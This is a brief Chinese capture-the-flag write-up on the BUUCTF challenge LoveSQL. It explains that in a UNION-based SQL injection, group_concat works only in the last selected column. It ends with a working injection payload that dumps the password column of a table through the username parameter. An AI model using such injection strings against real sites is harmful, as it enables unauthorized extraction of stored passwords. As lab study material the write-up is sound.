sql注入中联合查询group_concat位置
前言
- 题目环境 buuctf中[极客大挑战 2019]LoveSQL
- 联合查询中group_concat位置
思路
普通姿势
直到
可以看到报错,但我们的语句并没有任何错误
换到第三个位置就可以正常显示
本地实验也是会报错
最终payload都是在最后一个位置上
?username=amin%27union select 11,33,group_concat(password)from l0ve1ysq1--+%2B&password=222